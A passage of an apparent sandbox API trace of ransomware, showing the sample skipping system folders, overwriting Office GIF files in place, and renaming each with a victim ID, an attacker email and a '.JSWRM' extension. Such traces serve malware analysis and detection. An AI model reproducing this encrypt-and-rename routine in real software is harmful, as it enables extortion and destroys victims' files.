0x22d0d8 [0119.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0119.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0119.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0119.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0119.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.494] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR39F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir39f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR39F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir39f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0119.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.496] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2eda, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR3B.GIF", cAlternateFileName="")) returned 1 [0119.496] lstrcmpiW (lpString1="PDIR3B.GIF", lpString2=".") returned 1 [0119.496] lstrcmpiW (lpString1="PDIR3B.GIF", lpString2="..") returned 1 [0119.496] lstrcmpiW (lpString1="PDIR3B.GIF", lpString2="...") returned 1 [0119.496] lstrcmpiW (lpString1="PDIR3B.GIF", lpString2="windows") returned -1 [0119.496] lstrcmpiW (lpString1="PDIR3B.GIF", lpString2="recovery") returned -1 [0119.496] lstrcmpiW (lpString1="PDIR3B.GIF", lpString2="perflogs") returned -1 [0119.497] lstrcmpiW (lpString1="PDIR3B.GIF", lpString2="documents and settings") returned 1 [0119.497] lstrcmpiW (lpString1="PDIR3B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.497] lstrcmpiW (lpString1="PDIR3B.GIF", lpString2="system volume information") returned -1 [0119.497] lstrcmpiW (lpString1="PDIR3B.GIF", lpString2="msocache") returned 1 [0119.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0119.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR3B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR3B.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR3B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0119.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0119.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR3B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR3B.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR3B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0119.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR3B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir3b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.498] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=11994) returned 1 [0119.498] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ed0) returned 0x24e1d8 [0119.498] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2ed0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2ed0, lpOverlapped=0x0) returned 1 [0119.502] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.502] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2ed0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2ed0, lpOverlapped=0x0) returned 1 [0119.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.502] CloseHandle (hObject=0x314) returned 1 [0119.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0119.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0119.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0119.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0119.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.503] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR3B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir3b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR3B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir3b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.504] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4647, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR3F.GIF", cAlternateFileName="")) returned 1 [0119.504] lstrcmpiW (lpString1="PDIR3F.GIF", lpString2=".") returned 1 [0119.504] lstrcmpiW (lpString1="PDIR3F.GIF", lpString2="..") returned 1 [0119.504] lstrcmpiW (lpString1="PDIR3F.GIF", lpString2="...") returned 1 [0119.504] lstrcmpiW (lpString1="PDIR3F.GIF", lpString2="windows") returned -1 [0119.504] lstrcmpiW (lpString1="PDIR3F.GIF", lpString2="recovery") returned -1 [0119.504] lstrcmpiW (lpString1="PDIR3F.GIF", lpString2="perflogs") returned -1 [0119.504] lstrcmpiW (lpString1="PDIR3F.GIF", lpString2="documents and settings") returned 1 [0119.504] lstrcmpiW (lpString1="PDIR3F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.504] lstrcmpiW (lpString1="PDIR3F.GIF", lpString2="system volume information") returned -1 [0119.504] lstrcmpiW (lpString1="PDIR3F.GIF", lpString2="msocache") returned 1 [0119.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0119.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR3F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR3F.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR3F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0119.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0119.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR3F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR3F.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR3F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0119.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR3F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir3f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.505] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=17991) returned 1 [0119.506] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4640) returned 0x24e1d8 [0119.506] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x4640, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x4640, lpOverlapped=0x0) returned 1 [0119.515] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.515] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x4640, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x4640, lpOverlapped=0x0) returned 1 [0119.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.516] CloseHandle (hObject=0x314) returned 1 [0119.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0119.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0119.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0119.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0119.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0119.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.517] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR3F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir3f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR3F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir3f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0119.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.518] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10f19, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR40F.GIF", cAlternateFileName="")) returned 1 [0119.518] lstrcmpiW (lpString1="PDIR40F.GIF", lpString2=".") returned 1 [0119.518] lstrcmpiW (lpString1="PDIR40F.GIF", lpString2="..") returned 1 [0119.518] lstrcmpiW (lpString1="PDIR40F.GIF", lpString2="...") returned 1 [0119.518] lstrcmpiW (lpString1="PDIR40F.GIF", lpString2="windows") returned -1 [0119.518] lstrcmpiW (lpString1="PDIR40F.GIF", lpString2="recovery") returned -1 [0119.518] lstrcmpiW (lpString1="PDIR40F.GIF", lpString2="perflogs") returned -1 [0119.518] lstrcmpiW (lpString1="PDIR40F.GIF", lpString2="documents and settings") returned 1 [0119.518] lstrcmpiW (lpString1="PDIR40F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.518] lstrcmpiW (lpString1="PDIR40F.GIF", lpString2="system volume information") returned -1 [0119.518] lstrcmpiW (lpString1="PDIR40F.GIF", lpString2="msocache") returned 1 [0119.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0119.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR40F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR40F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR40F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0119.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR40F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR40F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR40F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR40F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir40f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.520] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=69401) returned 1 [0119.520] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10f10) returned 0x24e1d8 [0119.520] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x10f10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x10f10, lpOverlapped=0x0) returned 1 [0119.529] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.529] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x10f10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x10f10, lpOverlapped=0x0) returned 1 [0119.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.529] CloseHandle (hObject=0x314) returned 1 [0119.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0119.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0119.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0119.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0119.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0119.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.530] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR40F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir40f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR40F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: 